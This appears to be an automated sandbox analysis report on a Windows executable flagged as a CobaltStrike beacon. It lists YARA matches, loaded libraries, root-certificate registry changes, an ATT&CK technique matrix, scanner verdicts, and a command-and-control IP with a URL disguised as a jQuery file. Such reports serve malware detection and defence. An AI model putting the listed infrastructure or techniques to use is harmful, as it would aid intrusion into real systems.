        Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
        Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
        Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
        Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
        Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
        Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknownHTTPS traffic detected: 45.116.78.127:443 -> 192.168.2.5:49704 version: TLS 1.2

        System Summary

        barindex
        Source: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
        Source: 00000000.00000003.2047591169.000002B669FB0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00007FF7AD0414D8 VirtualProtect,VirtualProtect,GetModuleHandleA,GetProcAddress,NtFlushInstructionCache,GetCurrentProcess,NtFlushInstructionCache,VirtualProtect,0_2_00007FF7AD0414D8
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00007FF7AD0441900_2_00007FF7AD044190
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00007FF7AD0453700_2_00007FF7AD045370
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0BFC3E0_2_000002B66A0BFC3E
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0CA7080_2_000002B66A0CA708
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0D77400_2_000002B66A0D7740
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0BFDD60_2_000002B66A0BFDD6
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0CD3840_2_000002B66A0CD384
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0C48200_2_000002B66A0C4820
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0CC8880_2_000002B66A0CC888
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0D80B00_2_000002B66A0D80B0
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0CC11C0_2_000002B66A0CC11C
        Source: 1.exeStatic PE information: Number of sections : 11 > 10
        Source: 1.exe, 00000000.00000000.2025778844.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHipsMain.exeT vs 1.exe
        Source: 1.exeBinary or memory string: OriginalFilenameHipsMain.exeT vs 1.exe
        Source: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
        Source: 00000000.00000003.2047591169.000002B669FB0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
        Source: classification engineClassification label: mal100.troj.winEXE@1/1@0/1
        Source: 1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 1.exeVirustotal: Detection: 56%
        Source: 1.exeReversingLabs: Detection: 60%
        Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: 1.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: 1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
        Source: 1.exeStatic PE information: section name: .xdata
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB851E push ebp; ret 0_3_000002B669FB8525
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB4506 push edx; ret 0_3_000002B669FB451E
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB84EF push es; ret 0_3_000002B669FB84F6
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB4C86 push esi; ret 0_3_000002B669FB4C8F
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB67AC push ebx; ret 0_3_000002B669FB681A
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB5EA0 push ecx; ret 0_3_000002B669FB5EB3
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB41ED push esi; ret 0_3_000002B669FB41F2
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB7980 push ecx; ret 0_3_000002B669FB799E
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB5849 push eax; ret 0_3_000002B669FB582A
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB581B push eax; ret 0_3_000002B669FB582A
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB680C push ebx; ret 0_3_000002B669FB681A
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB7371 push esp; ret 0_3_000002B669FB73A2
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB5B75 push edx; ret 0_3_000002B669FB5B3E
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB4B4F push esp; ret 0_3_000002B669FB4B58
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB734E push ebx; ret 0_3_000002B669FB736E
        Source: C:\Users\user\Desktop\1.exeCode function: 0_3_000002B669FB62E5 push ebp; ret 0_3_000002B669FB62E9
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0B971E push cs; retf 0_2_000002B66A0B971F
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0D5C04 push ebp; iretd 0_2_000002B66A0D5C05
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0BAD58 push ebp; iretd 0_2_000002B66A0BAD59
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0C6A40 push cs; ret 0_2_000002B66A0C6A4B
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0B935D push edi; iretd 0_2_000002B66A0B935E
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0D5BBB push ebp; iretd 0_2_000002B66A0D5BBC
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0D5BDB push ebp; iretd 0_2_000002B66A0D5BDC

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\1.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Users\user\Desktop\1.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Users\user\Desktop\1.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: 1.exe, 00000000.00000002.3273403913.000002B669D3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
        Source: 1.exe, 00000000.00000003.2450698374.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649720745.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412463885.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2221934852.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688451879.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2922884622.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2337185318.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883830642.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2903576644.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: 1.exe, 00000000.00000003.2450698374.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649720745.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412463885.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2221934852.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688451879.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2922884622.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2337185318.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883830642.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2903576644.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00007FF7AD041180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,0_2_00007FF7AD041180
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00007FF7AD047FFA SetUnhandledExceptionFilter,0_2_00007FF7AD047FFA
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00007FF7AD099320 SetUnhandledExceptionFilter,TlsGetValue,0_2_00007FF7AD099320
        Source: C:\Users\user\Desktop\1.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\1.exeCode function: 0_2_000002B66A0C2FA8 GetUserNameA,strrchr,_snprintf,0_2_000002B66A0C2FA8
        Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000000.00000002.3273708088.000002B66A0DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.2047591169.000002B669FB0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 1.exe PID: 5540, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Modify Registry
        OS Credential Dumping1
        Query Registry
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Disable or Modify Tools
        LSASS Memory1
        Security Software Discovery
        Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Obfuscated Files or Information
        Security Account Manager1
        Account Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Install Root Certificate
        NTDS1
        System Owner/User Discovery
        Distributed Component Object ModelInput Capture112
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets2
        System Information Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        1.exe57%VirustotalBrowse
        1.exe61%ReversingLabsWin64.Trojan.CobaltStrike
        1.exe100%AviraHEUR/AGEN.1329646
        1.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://45.116.78.127/jquery-3.3.1.min.jsj0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsi0%Avira URL Cloudsafe
        https://45.116.78.127/16.78.127/der0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsh0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsm0%Avira URL Cloudsafe
        https://45.116.78.127/crosic0%Avira URL Cloudsafe
        45.116.78.1270%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsicate0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js-end-point:0%Avira URL Cloudsafe
        https://45.116.78.127/p0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsi%0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsp0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jss0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsv0%Avira URL Cloudsafe
        https://45.116.78.127/roviderU0%Avira URL Cloudsafe
        https://45.116.78.127/der0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsa0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsY0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jse0%Avira URL Cloudsafe
        https://45.116.78.127/16.78.127/l0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js/rovider0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsG0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsQ0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsO0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsU0%Avira URL Cloudsafe
        https://45.116.78.127/dep0%Avira URL Cloudsafe
        https://45.116.78.127/)0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd06ad0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js=0%Avira URL Cloudsafe
        https://45.116.78.127/16.78.127/0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd06C0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsC0%Avira URL Cloudsafe
        https://45.116.78.127/90%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js)0%Avira URL Cloudsafe
        https://45.116.78.127/=0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js00%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsim0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js.0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js/0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js50%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsic0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd060%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd06O0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js/e0%Avira URL Cloudsafe
        https://45.116.78.127/tography0%Avira URL Cloudsafe
        https://45.116.78.127/M0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsB_F0%Avira URL Cloudsafe
        https://45.116.78.127/E0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsiU0%Avira URL Cloudsafe
        https://45.116.78.127/0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsiO0%Avira URL Cloudsafe
        https://45.116.78.127/R0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsR3-0%Avira URL Cloudsafe
        https://45.116.78.127/i0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js0%Avira URL Cloudsafe
        https://45.116.78.127/l0%Avira URL Cloudsafe
        https://45.116.78.127/rovider0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.js/=0%Avira URL Cloudsafe
        https://45.116.78.127/jquery-3.3.1.min.jsyptography0%Avira URL Cloudsafe
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        45.116.78.127true
        • Avira URL Cloud: safe
        unknown
        https://45.116.78.127/jquery-3.3.1.min.jstrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://45.116.78.127/jquery-3.3.1.min.jsj1.exe, 00000000.00000003.2200192483.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://45.116.78.127/16.78.127/der1.exe, 00000000.00000003.2834956072.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://45.116.78.127/jquery-3.3.1.min.jsi1.exe, 00000000.00000003.2431369324.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2318143913.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2279731119.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2299019879.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412570457.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3006338364.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3177724289.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3119307893.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2570626524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2374875810.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://45.116.78.127/jquery-3.3.1.min.jsh1.exe, 00000000.00000003.2450698374.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649720745.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412463885.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2221934852.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688451879.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2922884622.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2337185318.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883830642.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2903576644.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2815589341.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3234673628.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2393356882.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941717680.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158599501.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2355972071.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273403913.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2200192483.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
